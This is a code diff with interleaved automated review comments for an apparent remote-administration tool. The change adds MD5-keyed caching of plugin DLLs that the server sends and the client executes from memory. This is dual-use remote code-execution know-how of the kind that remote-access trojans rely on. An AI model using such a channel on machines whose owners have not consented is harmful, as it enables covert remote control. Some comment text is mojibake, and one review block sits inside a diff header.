diff --git a/client/KernelManager.cpp b/client/KernelManager.cpp
index eb4a6c7..83359a8 100644
--- a/client/KernelManager.cpp
+++ b/client/KernelManager.cpp
@@ -198,13 +198,26 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength) {
 case CMD_EXECUTE_DLL:
 {
 #ifdef _WIN64
+ static std::map> m_MemDLL;
 const int sz = 1 + sizeof(DllExecuteInfo);
- if (ulLength <= sz)break;
+ if (ulLength < sz)break;
 DllExecuteInfo* info = (DllExecuteInfo*)(szBuffer + 1);
+ const char* md5 = info->Md5;
+ auto find = m_MemDLL.find(md5);
+ if (find == m_MemDLL.end() && ulLength == sz) {
+ // 第一个命令没有包含DLL数据,需客户端检测本地是否已经有相关DLL,没有则向主控请求执行代码
+ m_ClientObject->Send2Server((char*)szBuffer, ulLength);
+ break;
+ }
+ BYTE* data = find != m_MemDLL.end() ? find->second.data() : NULL;
 if (info->Size == ulLength - sz && info->RunType == MEMORYDLL) {
+ if (md5[0]) m_MemDLL[md5] = std::vector(szBuffer + sz, szBuffer + sz + info->Size);
+ data = szBuffer + sz;
+ }
+ if (data) {
 PluginParam param(m_conn->ServerIP(), m_conn->ServerPort(), &g_bExit, m_conn);
- CloseHandle(CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, szBuffer + sz), 0, NULL));
- Mprintf("Execute '%s'%d succeed: %d Length: %d\n", info->Name, info->CallType, szBuffer[1], info->Size);
+ CloseHandle(CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, data), 0, NULL));
+ Mprintf("Execute '%s'%d succeed - Length: %d\n", info->Name, info->CallType, info->Size);
 }
 #endif
 break;
diff --git a/common/commands.h b/common/commands.h
index 847148c..724b729 100644
--- a/common/commands.h
+++ b/common/commands.h
@@ -675,7 +675,8 @@ typedef struct DllExecuteInfo {
 int Size; // DLL 大小
 int CallType; // 调用方式
 char Name[32]; // DLL 名称
- char Reseverd[56];
+ char Md5[33]; // DLL MD5
+ char Reseverd[23];
 }DllExecuteInfo;
 enum
diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index bbaa92c..856db4c 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
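Review bot: `data` can point at storage the worker thread does not own: when it is `find->second.data()` it aliases a vector inside the static `m_MemDLL`, and a later CMD_EXECUTE_DLL that carries a payload with the same Md5 reassigns `m_MemDLL[md5]`, destroying that vector while an earlier ExecuteDLLProc thread may still be reading it. Guarding the assignment with `if (md5[0] && find == m_MemDLL.end())` keeps a cached buffer alive for the process lifetime, since the map is static and no entry is ever erased; the `data = szBuffer + sz` path hands the thread a pointer into the receive buffer exactly as the original code did, and whether that buffer outlives the thread is not visible here. Separately, `m_MemDLL.find(md5)` constructs a std::string from `info->Md5` and therefore depends on a NUL somewhere in the 33-byte field of a peer-supplied struct; `std::string md5(info->Md5, strnlen(info->Md5, sizeof(info->Md5)));` (with the later test becoming `!md5.empty()`) bounds that read. OnReceive's switch starts before the hunk.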
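Review bot: The struct is a wire layout shared by both ends (the client compares `info->Size` against `ulLength - sz` where `sz = 1 + sizeof(DllExecuteInfo)`), and the new `Md5[33]` + `Reseverd[23]` split keeps the former 56 bytes only by arithmetic that nothing records or checks. A comment on the new field such as `char Md5[33]; // DLL MD5 as hex text, NUL-terminated (client reads it as a C string); Md5 + Reseverd must stay 56 bytes` would document the invariant, and if the build allows it a `static_assert(sizeof(DllExecuteInfo) == DLLEXECUTEINFO_WIRE_SIZE, "DllExecuteInfo wire layout changed")` after the typedef (the constant being a placeholder for the size the struct had before this commit) would enforce it. The typedef's leading fields are outside the hunk.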
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -223,11 +223,13 @@ DllInfo* ReadPluginDll(const std::string& filename) {
 }
 // 璁剧疆杈撳嚭鍙傛暟
+ auto md5 = CalcMD5FromBytes(buffer + 1 + sizeof(DllExecuteInfo), fileSize);
 DllExecuteInfo info = { MEMORYDLL, fileSize, CALLTYPE_IOCPTHREAD, };
 memcpy(info.Name, name.c_str(), name.length());
+ memcpy(info.Md5, md5.c_str(), md5.length());
 buffer[0] = CMD_EXECUTE_DLL;
 memcpy(buffer + 1, &info, sizeof(DllExecuteInfo));
- Buffer* buf = new Buffer(buffer, 1 + sizeof(DllExecuteInfo) + fileSize);
+ Buffer* buf = new Buffer(buffer, 1 + sizeof(DllExecuteInfo) + fileSize, 0, md5);
 SAFE_DELETE_ARRAY(buffer);
 return new DllInfo{ name, buf };
 }
@@ -1639,6 +1641,17 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
 }
 switch (ContextObject->InDeCompressedBuffer.GetBYTE(0))
 {
+ case CMD_EXECUTE_DLL: // 璇锋眰DLL
+ {
+ DllExecuteInfo *info = (DllExecuteInfo*)ContextObject->InDeCompressedBuffer.GetBuffer(1);
+ for (std::vector::const_iterator i=m_DllList.begin(); i!=m_DllList.end(); ++i){
+ DllInfo* dll = *i;
+ if (dll->Name == info->Name) {
+ return m_iocpServer->OnClientPreSending(ContextObject, dll->Data->Buf(), dll->Data->length());
+ }
+ }
+ break;
+ }
 case COMMAND_PROXY:
 {
 g_2015RemoteDlg->SendMessage(WM_OPENPROXYDIALOG, 0, (LPARAM)ContextObject);
@@ -2625,7 +2638,7 @@ void CMy2015RemoteDlg::OnDynamicSubMenu(UINT nID) {
 Buffer* buf = m_DllList[menuIndex]->Data;
 int iItem = m_CList_Online.GetNextSelectedItem(Pos);
 CONTEXT_OBJECT* ContextObject = (CONTEXT_OBJECT*)m_CList_Online.GetItemData(iItem);
- m_iocpServer->OnClientPreSending(ContextObject, buf->Buf(), buf->length());
+ m_iocpServer->OnClientPreSending(ContextObject, buf->Buf(), 1 + sizeof(DllExecuteInfo));
 }
 LeaveCriticalSection(&m_cs);
 }
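Review bot: `memcpy(info.Md5, md5.c_str(), md5.length())` is unbounded: `Md5` holds 33 bytes, the copy length is whatever CalcMD5FromBytes returns, so any result longer than 32 characters runs into `Reseverd` and beyond, and a 33-character result leaves no terminator for the client's string read of the field. Bounding it, `memcpy(info.Md5, md5.c_str(), std::min(md5.length(), sizeof(info.Md5) - 1));` (or the project's own min, given the Windows `min` macro), keeps the copy inside the field and preserves the NUL from the zero-initialized aggregate. The pre-existing `info.Name` copy on the line above has the same shape against a 32-byte field and is worth fixing in the same way while here. Whether `buffer + 1 + sizeof(DllExecuteInfo)` already holds the file bytes at the point CalcMD5FromBytes is called is not visible in the hunk; ReadPluginDll's body starts before it.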
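Review bot: The new CMD_EXECUTE_DLL case parses a client-supplied message without a length check: `GetBuffer(1)` is cast to `DllExecuteInfo*` with no test that the decompressed buffer holds at least `1 + sizeof(DllExecuteInfo)` bytes, and `dll->Name == info->Name` reads `info->Name` as a NUL-terminated C string although `Name[32]` is filled by an unbounded memcpy in ReadPluginDll and so may carry no terminator, in which case the comparison reads on into `Md5` and past the struct. A size check on the buffer before the cast (using whatever length accessor InDeCompressedBuffer exposes) plus `if (dll->Name == std::string(info->Name, strnlen(info->Name, sizeof(info->Name)))) {` fixes both. `m_DllList` is walked here without the critical section that OnDynamicSubMenu appears to hold around its own read of the list (`LeaveCriticalSection(&m_cs)` in the last hunk), so if `m_cs` guards that vector this read should take it too. `return m_iocpServer->OnClientPreSending(...)` inside a VOID function is only well-formed if OnClientPreSending itself returns void, which is not visible here; the plain iterator loop could also be a range-for over `m_DllList`. MessageHandle's body starts before the hunk.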
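Review bot: The menu action now sends only the header (`1 + sizeof(DllExecuteInfo)`) and relies on the client echoing the command back when the Md5 is not cached, but nothing at the call site records that protocol change; a comment such as `// header only: a client that has not cached this Md5 echoes CMD_EXECUTE_DLL and MessageHandle then sends the full buffer` would explain why `buf->length()` is no longer used. A client built before this commit drops a header-only message silently (its old check was `ulLength <= sz`), so a mixed-version deployment fails without any log line; the comment should say that too. OnDynamicSubMenu's body starts before the hunk.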